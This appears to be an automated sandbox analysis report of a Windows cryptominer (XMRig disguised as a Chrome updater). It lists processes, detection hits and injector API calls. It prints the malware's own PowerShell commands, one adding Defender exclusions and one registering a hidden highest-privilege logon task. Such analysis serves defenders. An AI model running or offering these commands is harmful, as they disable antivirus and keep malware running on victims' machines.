File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	18:26:58
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	18:26:59
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	18:27:00
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	18:27:01
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:27:01
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
Imagebase:	0x7ff70f330000
File size:	5'980'672 bytes
MD5 hash:	3FB477EE2214BF2D4ED7DF2D23F159E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:27:02
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: svchost.exePID: 1296, Parent PID: 5796

General

Target ID:	24
Start time:	18:27:02
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	18:27:02
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:27:02
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	18:27:03
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	18:27:03
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	18:27:04
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	18:27:04
Start date:	07/10/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff609870000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	18:27:04
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	18:27:04
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	18:27:04
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	18:27:04
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	18:27:05
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	18:27:05
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	18:27:06
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	18:27:07
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	18:27:07
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	18:27:08
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	18:27:08
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	18:27:08
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	18:27:09
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	18:27:09
Start date:	07/10/2024
Path:	C:\Windows\System32\spoolsv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\spoolsv.exe
Imagebase:	0x7ff646ff0000
File size:	842'752 bytes
MD5 hash:	0D4B1E3E4488E9BDC035F23E1F4FE22F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	18:27:10
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	18:27:12
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	18:27:12
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	18:27:12
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FF6A04014B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1838713864.00007FF6A0401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A0400000, based on PE: true

Associated: 00000000.00000002.1838615697.00007FF6A0400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1838806707.00007FF6A041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1838933870.00007FF6A0440000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1840610451.00007FF6A09AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1840683106.00007FF6A09AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1840731510.00007FF6A09B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1840794472.00007FF6A09BA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1840863354.00007FF6A09BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a0400000_ylVAEHbMLf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cc93f7b19bfaeb148cae99ce2d9a2d98e1c8ad21f819d54012a117e1e035c07
Instruction ID: 9542ffae1e6ded45277a2934761bb24d69c07a23bf57dabbee99a8f4c2953ec9
Opcode Fuzzy Hash: 9cc93f7b19bfaeb148cae99ce2d9a2d98e1c8ad21f819d54012a117e1e035c07
Instruction Fuzzy Hash: 9EB0923091A20AA8E3042F0598412582620AB19780F805020DA0C56363CF6C50408710

Analysis Process: dialer.exePID: 5796, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	47.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	63.8%
Total number of Nodes:	232
Total number of Limit Nodes:	26

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF78AB32328 Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 194
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF78AB32078: StrCpyW.SHLWAPI ref: 00007FF78AB320AA
Part of subcall function 00007FF78AB32078: StrCatW.SHLWAPI ref: 00007FF78AB320B8
Part of subcall function 00007FF78AB32078: GetModuleHandleW.KERNEL32 ref: 00007FF78AB320C1
Part of subcall function 00007FF78AB32078: GetCurrentProcess.KERNEL32 ref: 00007FF78AB3210C
Part of subcall function 00007FF78AB32078: K32GetModuleInformation.KERNEL32 ref: 00007FF78AB32120
Part of subcall function 00007FF78AB32078: CreateFileW.KERNELBASE ref: 00007FF78AB32150
Part of subcall function 00007FF78AB32078: CreateFileMappingW.KERNELBASE ref: 00007FF78AB3217B
Part of subcall function 00007FF78AB32078: MapViewOfFile.KERNELBASE ref: 00007FF78AB3219F
Part of subcall function 00007FF78AB32078: lstrcmpiA.KERNEL32 ref: 00007FF78AB321EA
Part of subcall function 00007FF78AB32078: CloseHandle.KERNELBASE ref: 00007FF78AB32258
Part of subcall function 00007FF78AB32078: CloseHandle.KERNEL32 ref: 00007FF78AB32261
Part of subcall function 00007FF78AB32078: FreeLibrary.KERNEL32 ref: 00007FF78AB3226A

VerSetConditionMask.NTDLL ref: 00007FF78AB32397
VerSetConditionMask.NTDLL ref: 00007FF78AB323A8
VerSetConditionMask.NTDLL ref: 00007FF78AB323B9
VerifyVersionInfoW.KERNEL32 ref: 00007FF78AB323CC
GetCurrentProcessId.KERNEL32 ref: 00007FF78AB323DE
OpenProcess.KERNEL32 ref: 00007FF78AB323EE
OpenProcessToken.ADVAPI32 ref: 00007FF78AB3240F
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF78AB32429
AdjustTokenPrivileges.KERNELBASE ref: 00007FF78AB3246D
GetLastError.KERNEL32 ref: 00007FF78AB32477
CloseHandle.KERNELBASE ref: 00007FF78AB32480
FindResourceExA.KERNEL32 ref: 00007FF78AB32494
SizeofResource.KERNEL32 ref: 00007FF78AB324AB
LoadResource.KERNEL32 ref: 00007FF78AB324C4
LockResource.KERNEL32 ref: 00007FF78AB324D6
GetCurrentProcessId.KERNEL32 ref: 00007FF78AB324E3
RegCreateKeyExW.KERNELBASE ref: 00007FF78AB32524
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF78AB32557
RegSetKeySecurity.KERNELBASE ref: 00007FF78AB32574
LocalFree.KERNEL32 ref: 00007FF78AB32581
RegCreateKeyExW.KERNELBASE ref: 00007FF78AB325B9
GetCurrentProcessId.KERNEL32 ref: 00007FF78AB325C3
RegSetValueExW.KERNELBASE ref: 00007FF78AB325F1
RegCloseKey.KERNELBASE ref: 00007FF78AB325FC
RegCloseKey.ADVAPI32 ref: 00007FF78AB32607
CreateThread.KERNELBASE ref: 00007FF78AB32628
GetProcessHeap.KERNEL32 ref: 00007FF78AB3262E
HeapAlloc.KERNEL32 ref: 00007FF78AB3263D
CreateThread.KERNELBASE ref: 00007FF78AB3266C
CreateThread.KERNELBASE ref: 00007FF78AB3268D
SleepEx.KERNELBASE ref: 00007FF78AB32695

Strings

DLL, xrefs: 00007FF78AB32486
svc64, xrefs: 00007FF78AB325CE
kernel32.dll, xrefs: 00007FF78AB323D2
ntdll.dll, xrefs: 00007FF78AB3233B
SOFTWARE\dialerconfig, xrefs: 00007FF78AB324FF
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00007FF78AB32550
pid, xrefs: 00007FF78AB32596
SeDebugPrivilege, xrefs: 00007FF78AB32422

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: CreateProcess$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeHeapModuleOpenTokenValue$AdjustAllocConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
API String ID: 2439791646-1130149537
Opcode ID: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
Instruction ID: 1df696b3b34a9ce3d77e5e0a65a388fd9d20d85979bdded3b7b13f6aef5e7a50
Opcode Fuzzy Hash: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
Instruction Fuzzy Hash: FFA12A35E0AB82A6F720AF61E8443AABBE1FB84754FA04179DA4D47B64DF3CD148C710

Function 00007FF78AB310C0 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 259
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF78AB319AC: OpenProcess.KERNEL32(?,?,?,00007FF78AB3110E), ref: 00007FF78AB319CA
Part of subcall function 00007FF78AB319AC: IsWow64Process.KERNEL32(?,?,?,00007FF78AB3110E), ref: 00007FF78AB319E0
Part of subcall function 00007FF78AB319AC: CloseHandle.KERNELBASE(?,?,?,00007FF78AB3110E), ref: 00007FF78AB319FB

OpenProcess.KERNEL32 ref: 00007FF78AB3112C
OpenProcess.KERNEL32 ref: 00007FF78AB3114B
K32GetModuleFileNameExW.KERNEL32 ref: 00007FF78AB31170
PathFindFileNameW.SHLWAPI ref: 00007FF78AB3117E
lstrlenW.KERNEL32 ref: 00007FF78AB3118A
StrCpyW.SHLWAPI ref: 00007FF78AB311A1
CloseHandle.KERNEL32 ref: 00007FF78AB311AD
StrCmpIW.SHLWAPI ref: 00007FF78AB311ED
NtQueryInformationProcess.NTDLL ref: 00007FF78AB31221
OpenProcessToken.ADVAPI32 ref: 00007FF78AB3124B
GetTokenInformation.KERNELBASE ref: 00007FF78AB31277
GetLastError.KERNEL32 ref: 00007FF78AB31281
LocalAlloc.KERNEL32 ref: 00007FF78AB31294
GetTokenInformation.KERNELBASE ref: 00007FF78AB312C0
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF78AB312CD
GetSidSubAuthority.ADVAPI32 ref: 00007FF78AB312DC
LocalFree.KERNEL32 ref: 00007FF78AB312F4
CloseHandle.KERNEL32 ref: 00007FF78AB31308
StrStrA.SHLWAPI ref: 00007FF78AB313B2
VirtualAllocEx.KERNELBASE ref: 00007FF78AB31419
WriteProcessMemory.KERNELBASE ref: 00007FF78AB3143C
WaitForSingleObject.KERNEL32 ref: 00007FF78AB31488
GetExitCodeThread.KERNEL32 ref: 00007FF78AB3149E
CloseHandle.KERNELBASE ref: 00007FF78AB314B6
CloseHandle.KERNEL32 ref: 00007FF78AB314BF

Strings

@, xrefs: 00007FF78AB3140C
dialer.exe, xrefs: 00007FF78AB311D8
WmiPrvSE.exe, xrefs: 00007FF78AB311CC
MSBuild.exe, xrefs: 00007FF78AB311B8
ReflectiveDllMain, xrefs: 00007FF78AB313A8

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
API String ID: 2561231171-2835194517
Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction ID: ec45e5ec30106472c26ff59dd88b6f6ebc29bb989249f860423906725543c200
Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction Fuzzy Hash: F3B17175E0A642A6FB10AF12E88027ABBE5FF44B84FA08179CA4E47B54DF3CE545C750

Function 00007FF78AB314E4 Relevance: 19.6, APIs: 13, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF78AB31517
HeapAlloc.KERNEL32 ref: 00007FF78AB3152A
GetProcessHeap.KERNEL32 ref: 00007FF78AB31538
HeapAlloc.KERNEL32 ref: 00007FF78AB31549
K32EnumProcesses.KERNEL32 ref: 00007FF78AB31563
OpenProcess.KERNEL32 ref: 00007FF78AB31591
K32EnumProcessModules.KERNEL32 ref: 00007FF78AB315B6
ReadProcessMemory.KERNELBASE ref: 00007FF78AB315ED
CloseHandle.KERNELBASE ref: 00007FF78AB31629
GetProcessHeap.KERNEL32 ref: 00007FF78AB3163B
HeapFree.KERNEL32 ref: 00007FF78AB31649
GetProcessHeap.KERNEL32 ref: 00007FF78AB3164F
HeapFree.KERNEL32 ref: 00007FF78AB3165D

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction ID: ec3cceac381b3972f2706011c7956d41b17d5cfe69c9080ac55e8ebf5cc66466
Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction Fuzzy Hash: AD51C532F16A826AFB60EF62E8446BAAAE4FB45B84F944038DE0D47B54DF3CD445C710

Function 00007FF78AB31C64 Relevance: 9.1, APIs: 6, Instructions: 88
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF78AB31CB3
SetEntriesInAclW.ADVAPI32 ref: 00007FF78AB31D14
LocalAlloc.KERNEL32 ref: 00007FF78AB31D24
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF78AB31D3A
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF78AB31D52
CreateNamedPipeW.KERNELBASE ref: 00007FF78AB31D94

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

